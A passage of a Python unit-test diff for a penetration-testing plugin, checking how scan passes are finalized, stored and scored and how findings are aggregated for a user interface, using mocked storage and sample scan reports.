f"QmCID{cid_counter['n']}") + return f"QmCID{cid_counter['n']}" + plugin.r1fs.add_json.side_effect = fake_add_json + + # Job config in R1FS + plugin.r1fs.get_json.return_value = { + "target": "example.com", "start_port": 1, "end_port": 1024, + "run_mode": run_mode, "enabled_features": [], "monitor_interval": 60, + } + + # Build job_specs with two finished workers + job_specs = { + "job_id": job_id, + "job_status": "RUNNING", + "job_pass": job_pass, + "run_mode": run_mode, + "launcher": "launcher-node", + "launcher_alias": "launcher-alias", + "target": "example.com", + "task_name": "Test", + "start_port": 1, + "end_port": 1024, + "date_created": 1000000.0, + "risk_score": 0, + "job_config_cid": "QmConfigCID", + "workers": { + "worker-A": {"start_port": 1, "end_port": 512, "finished": True, "report_cid": "QmReportA"}, + "worker-B": {"start_port": 513, "end_port": 1024, "finished": True, "report_cid": "QmReportB"}, + }, + "timeline": [{"type": "created", "label": "Created", "date": 1000000.0, "actor": "launcher-alias", "actor_type": "system", "meta": {}}], + "pass_reports": [], + } + + plugin.chainstore_hgetall.return_value = {job_id: job_specs} + plugin.chainstore_hset = MagicMock() + + Plugin = self._get_plugin_class() + plugin._count_nested_findings = lambda section: Plugin._count_nested_findings(section) + plugin._count_all_findings = lambda report: Plugin._count_all_findings(plugin, report) + + return plugin, job_specs + + def _sample_node_report( + self, + start_port=1, + end_port=512, + open_ports=None, + findings=None, + graybox_findings=None, + web_findings=None, + correlation_findings=None, + ): + """Build a sample node report dict.""" + report = { + "start_port": start_port, + "end_port": end_port, + "open_ports": open_ports or [80, 443], + "ports_scanned": end_port - start_port + 1, + "nr_open_ports": len(open_ports or [80, 443]), + "service_info": {}, + "web_tests_info": {}, + "completed_tests": ["port_scan"], + "port_protocols": {"80": "http", "443": "https"}, + "port_banners": {}, + "correlation_findings": correlation_findings or [], + "graybox_results": {}, + } + if findings: + # Add findings under service_info for port 80 + report["service_info"] = { + "80": { + "_service_info_http": { + "findings": findings, + } + } + } + if web_findings: + report["web_tests_info"] = { + "80": { + "_web_test_xss": { + "findings": web_findings, + } + } + } + if graybox_findings: + report["graybox_results"] = { + "443": { + "_graybox_test": { + "findings": graybox_findings, + } + } + } + return report + + def test_single_aggregation(self): + """_collect_node_reports called exactly once per pass finalization.""" + PentesterApi01Plugin = self._get_plugin_class() + plugin, job_specs = self._build_finalize_plugin() + + # Mock _collect_node_reports and _get_aggregated_report + report_a = self._sample_node_report(1, 512, [80]) + report_b = self._sample_node_report(513, 1024, [443]) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a, "worker-B": report_b}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80, 443], "service_info": {}, "web_tests_info": {}, + "completed_tests": ["port_scan"], "ports_scanned": 1024, + "nr_open_ports": 2, "port_protocols": {"80": "http", "443": "https"}, + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com", "monitor_interval": 60}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 25, "breakdown": {}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + # _collect_node_reports called exactly once + plugin._collect_node_reports.assert_called_once() + + def test_pass_report_cid_in_r1fs(self): + """PassReport stored in R1FS with correct fields.""" + PentesterApi01Plugin = self._get_plugin_class() + plugin, job_specs = self._build_finalize_plugin() + + report_a = self._sample_node_report(1, 512, [80]) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + "port_protocols": {"80": "http"}, + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 10, "breakdown": {"findings_score": 5}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + # r1fs.add_json called twice: once for aggregated data, once for PassReport + self.assertEqual(plugin.r1fs.add_json.call_count, 2) + + # Second call is the PassReport + pass_report_dict = plugin.r1fs.add_json.call_args_list[1][0][0] + self.assertEqual(pass_report_dict["pass_nr"], 1) + self.assertIn("aggregated_report_cid", pass_report_dict) + self.assertIn("worker_reports", pass_report_dict) + self.assertEqual(pass_report_dict["risk_score"], 10) + self.assertIn("risk_breakdown", pass_report_dict) + self.assertIn("date_started", pass_report_dict) + self.assertIn("date_completed", pass_report_dict) + + def test_pass_report_worker_meta_counts_graybox_findings(self): + """WorkerReportMeta.nr_findings includes graybox findings.""" + PentesterApi01Plugin = self._get_plugin_class() + plugin, job_specs = self._build_finalize_plugin() + + report_a = self._sample_node_report( + 1, + 512, + [443], + findings=[{"title": "svc"}], + web_findings=[{"title": "web"}], + graybox_findings=[ + {"scenario_id": "S1", "status": "vulnerable"}, + {"scenario_id": "S2", "status": "not_vulnerable"}, + ], + correlation_findings=[{"title": "corr"}], + ) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [443], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + "port_protocols": {"443": "https"}, "graybox_results": report_a["graybox_results"], + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com", "scan_type": "webapp"}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 10, "breakdown": {"findings_score": 5}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + pass_report_dict = plugin.r1fs.add_json.call_args_list[1][0][0] + self.assertEqual(pass_report_dict["worker_reports"]["worker-A"]["nr_findings"], 5) + + def test_aggregated_report_separate_cid(self): + """aggregated_report_cid is a separate R1FS write from the PassReport.""" + PentesterApi01Plugin = self._get_plugin_class() + plugin, job_specs = self._build_finalize_plugin(r1fs_returns={1: "QmAggCID", 2: "QmPassCID"}) + + report_a = self._sample_node_report(1, 512, [80]) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + "port_protocols": {}, + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 0, "breakdown": {}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + # First R1FS write = aggregated data, second = PassReport + agg_dict = plugin.r1fs.add_json.call_args_list[0][0][0] + pass_dict = plugin.r1fs.add_json.call_args_list[1][0][0] + + # The PassReport references the aggregated CID + self.assertEqual(pass_dict["aggregated_report_cid"], "QmAggCID") + + # Aggregated data should have open_ports (from AggregatedScanData) + self.assertIn("open_ports", agg_dict) + + def test_continuous_pass_returns_job_status_to_running(self): + """Continuous monitoring jobs re-enter RUNNING after pass finalization.""" + PentesterApi01Plugin = self._get_plugin_class() + plugin, job_specs = self._build_finalize_plugin(run_mode="CONTINUOUS_MONITORING") + + report_a = self._sample_node_report(1, 512, [80]) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + "port_protocols": {"80": "http"}, + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com", "monitor_interval": 60}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 10, "breakdown": {}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + self.assertEqual(job_specs["job_status"], "RUNNING") + self.assertIsNotNone(job_specs.get("next_pass_at")) + + def test_continuous_pass_cap_stops_and_archives_job(self): + """Continuous jobs stop and archive instead of scheduling pass 101.""" + PentesterApi01Plugin = self._get_plugin_class() + plugin, job_specs = self._build_finalize_plugin( + run_mode="CONTINUOUS_MONITORING", + job_pass=MAX_CONTINUOUS_PASSES, + ) + + report_a = self._sample_node_report(1, 512, [80]) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + "port_protocols": {"80": "http"}, + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com", "monitor_interval": 60}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 10, "breakdown": {}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + plugin._build_job_archive = MagicMock() + plugin._clear_live_progress = MagicMock() + plugin._log_audit_event = MagicMock() + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + self.assertEqual(job_specs["job_status"], "STOPPED") + self.assertIsNone(job_specs.get("next_pass_at")) + plugin._build_job_archive.assert_called_once_with(job_specs["job_id"], job_specs) + plugin._clear_live_progress.assert_called_once() + plugin._log_audit_event.assert_called_once_with("continuous_pass_cap_reached", { + "job_id": job_specs["job_id"], + "pass_nr": MAX_CONTINUOUS_PASSES, + "max_continuous_passes": MAX_CONTINUOUS_PASSES, + }) + event_types = [c.args[1] for c in plugin._emit_timeline_event.call_args_list] + self.assertIn("pass_cap_reached", event_types) + self.assertIn("stopped", event_types) + + def test_continuous_pass_cap_handles_recovered_over_cap_state(self): + """Recovered continuous jobs already over cap are stopped cleanly.""" + PentesterApi01Plugin = self._get_plugin_class() + plugin, job_specs = self._build_finalize_plugin( + run_mode="CONTINUOUS_MONITORING", + job_pass=MAX_CONTINUOUS_PASSES + 2, + ) + + report_a = self._sample_node_report(1, 512, [80]) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + "port_protocols": {"80": "http"}, + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com", "monitor_interval": 60}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 10, "breakdown": {}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + plugin._build_job_archive = MagicMock() + plugin._clear_live_progress = MagicMock() + plugin._log_audit_event = MagicMock() + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + self.assertEqual(job_specs["job_status"], "STOPPED") + plugin._build_job_archive.assert_called_once_with(job_specs["job_id"], job_specs) + plugin._log_audit_event.assert_called_once() + + def test_finding_id_deterministic(self): + """Same input produces same finding_id; different title produces different id.""" + PentesterApi01Plugin = self._get_plugin_class() + + aggregated = { + "open_ports": [80], "ports_scanned": 100, "nr_open_ports": 1, + "port_protocols": {"80": "http"}, + "service_info": { + "80": { + "_service_info_http": { + "findings": [ + {"title": "SQL Injection", "severity": "HIGH", "cwe_id": "CWE-89", "confidence": "firm"}, + ] + } + } + }, + "web_tests_info": {}, + "correlation_findings": [], + } + + risk1, findings1 = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated) + risk2, findings2 = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated) + + self.assertEqual(findings1[0]["finding_id"], findings2[0]["finding_id"]) + + # Different title → different finding_id + aggregated2 = { + "open_ports": [80], "ports_scanned": 100, "nr_open_ports": 1, + "port_protocols": {"80": "http"}, + "service_info": { + "80": { + "_service_info_http": { + "findings": [ + {"title": "XSS Vulnerability", "severity": "HIGH", "cwe_id": "CWE-79", "confidence": "firm"}, + ] + } + } + }, + "web_tests_info": {}, + "correlation_findings": [], + } + _, findings3 = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated2) + self.assertNotEqual(findings1[0]["finding_id"], findings3[0]["finding_id"]) + + def test_finding_id_cwe_collision(self): + """Same CWE, different title, same port+probe → different finding_ids.""" + PentesterApi01Plugin = self._get_plugin_class() + + aggregated = { + "open_ports": [80], "ports_scanned": 100, "nr_open_ports": 1, + "port_protocols": {"80": "http"}, + "service_info": { + "80": { + "_web_test_xss": { + "findings": [ + {"title": "Reflected XSS in search", "severity": "HIGH", "cwe_id": "CWE-79", "confidence": "certain"}, + {"title": "Stored XSS in comment", "severity": "HIGH", "cwe_id": "CWE-79", "confidence": "certain"}, + ] + } + } + }, + "web_tests_info": {}, + "correlation_findings": [], + } + + _, findings = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated) + self.assertEqual(len(findings), 2) + self.assertNotEqual(findings[0]["finding_id"], findings[1]["finding_id"]) + + def test_finding_enrichment_fields(self): + """Each finding has finding_id, port, protocol, probe, category.""" + PentesterApi01Plugin = self._get_plugin_class() + + aggregated = { + "open_ports": [443], "ports_scanned": 100, "nr_open_ports": 1, + "port_protocols": {"443": "https"}, + "service_info": { + "443": { + "_service_info_ssl": { + "findings": [ + {"title": "Weak TLS", "severity": "MEDIUM", "cwe_id": "CWE-326", "confidence": "certain"}, + ] + } + } + }, + "web_tests_info": {}, + "correlation_findings": [], + } + + _, findings = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated) + self.assertEqual(len(findings), 1) + f = findings[0] + self.assertIn("finding_id", f) + self.assertEqual(len(f["finding_id"]), 16) # 16-char hex + self.assertEqual(f["port"], 443) + self.assertEqual(f["protocol"], "https") + self.assertEqual(f["probe"], "_service_info_ssl") + self.assertEqual(f["category"], "service") + + def test_port_protocols_none(self): + """port_protocols is None → protocol defaults to 'unknown' (no crash).""" + PentesterApi01Plugin = self._get_plugin_class() + + aggregated = { + "open_ports": [22], "ports_scanned": 100, "nr_open_ports": 1, + "port_protocols": None, + "service_info": { + "22": { + "_service_info_ssh": { + "findings": [ + {"title": "Weak SSH key", "severity": "LOW", "cwe_id": "CWE-320", "confidence": "firm"}, + ] + } + } + }, + "web_tests_info": {}, + "correlation_findings": [], + } + + _, findings = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated) + self.assertEqual(len(findings), 1) + self.assertEqual(findings[0]["protocol"], "unknown") + + def test_llm_success_no_llm_failed(self): + """LLM succeeds → llm_failed absent from serialized PassReport.""" + from extensions.business.cybersec.red_mesh.models import PassReport + + pr = PassReport( + pass_nr=1, date_started=1000.0, date_completed=1100.0, duration=100.0, + aggregated_report_cid="QmAgg", + worker_reports={}, + risk_score=50, + llm_analysis="# Analysis\nAll good.", + quick_summary="No critical issues found.", + llm_failed=None, # success + ) + d = pr.to_dict() + self.assertNotIn("llm_failed", d) + self.assertEqual(d["llm_analysis"], "# Analysis\nAll good.") + + def test_llm_failure_flag_and_timeline(self): + """LLM fails → llm_failed: True, timeline event added.""" + PentesterApi01Plugin = self._get_plugin_class() + plugin, job_specs = self._build_finalize_plugin(llm_enabled=True) + + report_a = self._sample_node_report(1, 512, [80]) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + "port_protocols": {}, + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 10, "breakdown": {}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + + # LLM returns None (failure) + plugin._run_aggregated_llm_analysis = MagicMock(return_value=None) + plugin._run_quick_summary_analysis = MagicMock(return_value=None) + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + # Check PassReport has llm_failed=True + pass_report_dict = plugin.r1fs.add_json.call_args_list[1][0][0] + self.assertTrue(pass_report_dict.get("llm_failed")) + + # Check timeline event was emitted for llm_failed + llm_failed_calls = [ + c for c in plugin._emit_timeline_event.call_args_list + if c[0][1] == "llm_failed" + ] + self.assertEqual(len(llm_failed_calls), 1) + # _emit_timeline_event(job_specs, "llm_failed", label, meta={"pass_nr": ...}) + call_kwargs = llm_failed_calls[0][1] # keyword args + meta = call_kwargs.get("meta", {}) + self.assertIn("pass_nr", meta) + + def test_non_retryable_llm_failure_skips_quick_summary(self): + """Permanent LLM request failures should not retry through quick summary.""" + PentesterApi01Plugin = self._get_plugin_class() + plugin, job_specs = self._build_finalize_plugin(llm_enabled=True) + + report_a = self._sample_node_report(1, 512, [80]) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + "port_protocols": {}, + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 10, "breakdown": {}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + plugin.P = MagicMock() + plugin._last_llm_analysis_status = None + + def _fail_main(*_args, **_kwargs): + plugin._last_llm_analysis_status = "provider_request_error" + return None + + plugin._run_aggregated_llm_analysis = MagicMock(side_effect=_fail_main) + plugin._run_quick_summary_analysis = MagicMock(return_value=None) + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + plugin._run_quick_summary_analysis.assert_not_called() + plugin.P.assert_any_call( + f"Skipping quick summary for job {job_specs['job_id']} after non-retryable LLM failure (provider_request_error)", + color='y' + ) + + def test_pass_reports_survive_typed_job_record_rewrites(self): + """Pass reports must stay attached after typed repository rewrites the job dict.""" + PentesterApi01Plugin = self._get_plugin_class() + plugin, job_specs = self._build_finalize_plugin() + job_specs["scan_type"] = "network" + job_specs["target_url"] = "" + plugin.chainstore_hget.return_value = job_specs + + report_a = self._sample_node_report(1, 512, [80]) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + "port_protocols": {"80": "http"}, + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com", "scan_type": "network"}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 10, "breakdown": {}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + plugin._build_job_archive = MagicMock() + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + self.assertEqual(len(job_specs["pass_reports"]), 1) + self.assertEqual(job_specs["pass_reports"][0]["pass_nr"], 1) + archived_job_specs = plugin._build_job_archive.call_args[0][1] + self.assertEqual(len(archived_job_specs["pass_reports"]), 1) + + def test_aggregated_report_write_failure(self): + """R1FS fails for aggregated → pass finalization skipped, no partial state.""" + PentesterApi01Plugin = self._get_plugin_class() + # First R1FS write (aggregated) returns None = failure + plugin, job_specs = self._build_finalize_plugin(r1fs_returns={1: None, 2: "QmPassCID"}) + + report_a = self._sample_node_report(1, 512, [80]) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + "port_protocols": {}, + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 0, "breakdown": {}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + # CStore should NOT have pass_reports appended + self.assertEqual(len(job_specs["pass_reports"]), 0) + # CStore hset was called for intermediate status updates (COLLECTING, ANALYZING, FINALIZING) + # but NOT for finalization — verify job_status is NOT FINALIZED in the last write + for call_args in plugin.chainstore_hset.call_args_list: + value = call_args.kwargs.get("value") or call_args[1].get("value") if len(call_args) > 1 else None + if isinstance(value, dict): + self.assertNotEqual(value.get("job_status"), "FINALIZED") + + def test_pass_report_write_failure(self): + """R1FS fails for pass report → CStore pass_reports not appended.""" + PentesterApi01Plugin = self._get_plugin_class() + # First R1FS write (aggregated) succeeds, second (pass report) fails + plugin, job_specs = self._build_finalize_plugin(r1fs_returns={1: "QmAggCID", 2: None}) + + report_a = self._sample_node_report(1, 512, [80]) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + "port_protocols": {}, + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 0, "breakdown": {}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + # CStore should NOT have pass_reports appended + self.assertEqual(len(job_specs["pass_reports"]), 0) + # CStore hset was called for status updates but NOT for finalization + for call_args in plugin.chainstore_hset.call_args_list: + value = call_args.kwargs.get("value") or call_args[1].get("value") if len(call_args) > 1 else None + if isinstance(value, dict): + self.assertNotEqual(value.get("job_status"), "FINALIZED") + + def test_cstore_risk_score_updated(self): + """After pass, risk_score on CStore matches pass result.""" + PentesterApi01Plugin = self._get_plugin_class() + plugin, job_specs = self._build_finalize_plugin() + + report_a = self._sample_node_report(1, 512, [80]) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + "port_protocols": {}, + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 42, "breakdown": {"findings_score": 30}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + # CStore risk_score updated + self.assertEqual(job_specs["risk_score"], 42) + + # PassReportRef in pass_reports has same risk_score + self.assertEqual(len(job_specs["pass_reports"]), 1) + ref = job_specs["pass_reports"][0] + self.assertEqual(ref["risk_score"], 42) + self.assertIn("report_cid", ref) + self.assertEqual(ref["pass_nr"], 1) + + + +class TestPhase4UiAggregate(unittest.TestCase): + """Phase 4: UI Aggregate Computation.""" + + @classmethod + def _mock_plugin_modules(cls): + if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: + return + mock_plugin_modules() + + def _get_plugin_class(self): + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + return PentesterApi01Plugin + + def _make_plugin(self): + plugin = MagicMock() + Plugin = self._get_plugin_class() + plugin._count_services = lambda si: Plugin._count_services(plugin, si) + plugin._dedupe_items = lambda items: Plugin._dedupe_items(items) + plugin._extract_graybox_ui_stats = lambda aggregated, latest_pass=None: Plugin._extract_graybox_ui_stats( + plugin, aggregated, latest_pass + ) + plugin._compute_ui_aggregate = lambda passes, agg, job_config=None: Plugin._compute_ui_aggregate( + plugin, passes, agg, job_config=job_config + ) + plugin.SEVERITY_ORDER = Plugin.SEVERITY_ORDER + plugin.CONFIDENCE_ORDER = Plugin.CONFIDENCE_ORDER + return plugin, Plugin + + def _make_finding(self, severity="HIGH", confidence="firm", finding_id="abc123", title="Test"): + return {"finding_id": finding_id, "severity": severity, "confidence": confidence, "title": title} + + def _make_pass(self, pass_nr=1, findings=None, risk_score=0, worker_reports=None): + return { + "pass_nr": pass_nr, + "risk_score": risk_score, + "risk_breakdown": {"findings_score": 10}, + "quick_summary": "Summary text", + "findings": findings, + "worker_reports": worker_reports or { + "w1": {"start_port": 1, "end_port": 512, "open_ports": [80]}, + }, + } + + def _make_aggregated(self, open_ports=None, service_info=None): + return { + "open_ports": open_ports or [80, 443], + "service_info": service_info or { + "80": {"_service_info_http": {"findings": []}}, + "443": {"_service_info_https": {"findings": []}}, + }, + } + + def _make_webapp_aggregated(self): + return { + "open_ports": [443], + "service_info": { + "443": { + "_graybox_discovery": { + "routes": ["/login", "/login", "/admin"], + "forms": [ + {"action": "/login", "method": "POST"}, + {"action": "/login", "method": "POST"}, + {"action": "/admin", "method": "POST"}, + ], + "findings": [], + }, + }, + }, + "graybox_results": { + "443": { + "_graybox_authz": { + "findings": [ + {"scenario_id": "S-1", "status": "vulnerable", "severity": "HIGH"}, + {"scenario_id": "S-2", "status": "not_vulnerable", "severity": "INFO"}, + {"scenario_id": "S-3", "status": "inconclusive", "severity": "INFO"}, + ], + }, + }, + }, + } + + def test_findings_count_uppercase_keys(self): + """findings_count keys are UPPERCASE.""" + plugin, _ = self._make_plugin() + findings = [ + self._make_finding(severity="CRITICAL", finding_id="f1"), + self._make_finding(severity="HIGH", finding_id="f2"), + self._make_finding(severity="HIGH", finding_id="f3"), + self._make_finding(severity="MEDIUM", finding_id="f4"), + ] + p = self._make_pass(findings=findings) + agg = self._make_aggregated() + result = plugin._compute_ui_aggregate([p], agg) + fc = result.to_dict()["findings_count"] + self.assertEqual(fc["CRITICAL"], 1) + self.assertEqual(fc["HIGH"], 2) + self.assertEqual(fc["MEDIUM"], 1) + for key in fc: + self.assertEqual(key, key.upper()) + + def test_top_findings_max_10(self): + """More than 10 CRITICAL+HIGH -> capped at 10.""" + plugin, _ = self._make_plugin() + findings = [self._make_finding(severity="CRITICAL", finding_id=f"f{i}") for i in range(15)] + p = self._make_pass(findings=findings) + agg = self._make_aggregated() + result = plugin._compute_ui_aggregate([p], agg) + self.assertEqual(len(result.to_dict()["top_findings"]), 10) + + def test_top_findings_sorted(self): + """CRITICAL before HIGH, within same severity sorted by confidence.""" + plugin, _ = self._make_plugin() + findings = [ + self._make_finding(severity="HIGH", confidence="certain", finding_id="f1", title="H-certain"), + self._make_finding(severity="CRITICAL", confidence="tentative", finding_id="f2", title="C-tentative"), + self._make_finding(severity="HIGH", confidence="tentative", finding_id="f3", title="H-tentative"), + self._make_finding(severity="CRITICAL", confidence="certain", finding_id="f4", title="C-certain"), + ] + p = self._make_pass(findings=findings) + agg = self._make_aggregated() + result = plugin._compute_ui_aggregate([p], agg) + top = result.to_dict()["top_findings"] + self.assertEqual(top[0]["title"], "C-certain") + self.assertEqual(top[1]["title"], "C-tentative") + self.assertEqual(top[2]["title"], "H-certain") + self.assertEqual(top[3]["title"], "H-tentative") + + def test_top_findings_excludes_medium(self): + """MEDIUM/LOW/INFO findings never in top_findings.""" + plugin, _ = self._make_plugin() + findings = [ + self._make_finding(severity="MEDIUM", finding_id="f1"), + self._make_finding(severity="LOW", finding_id="f2"), + self._make_finding(severity="INFO", finding_id="f3"), + ] + p = self._make_pass(findings=findings) + agg = self._make_aggregated() + result = plugin._compute_ui_aggregate([p], agg) + d = result.to_dict() + self.assertNotIn("top_findings", d) # stripped by _strip_none (None) + + def test_finding_timeline_single_pass(self): + """1 pass -> finding_timeline is None (stripped).""" + plugin, _ = self._make_plugin() + p = self._make_pass(findings=[]) + agg = self._make_aggregated() + result = plugin._compute_ui_aggregate([p], agg) + d = result.to_dict() + self.assertNotIn("finding_timeline", d) # None → stripped + + def test_finding_timeline_multi_pass(self): + """3 passes with overlapping findings -> correct first_seen, last_seen, pass_count.""" + plugin, _ = self._make_plugin() + f_persistent = self._make_finding(finding_id="persist1") + f_transient = self._make_finding(finding_id="transient1") + f_new = self._make_finding(finding_id="new1") + passes = [ + self._make_pass(pass_nr=1, findings=[f_persistent, f_transient]), + self._make_pass(pass_nr=2, findings=[f_persistent]), + 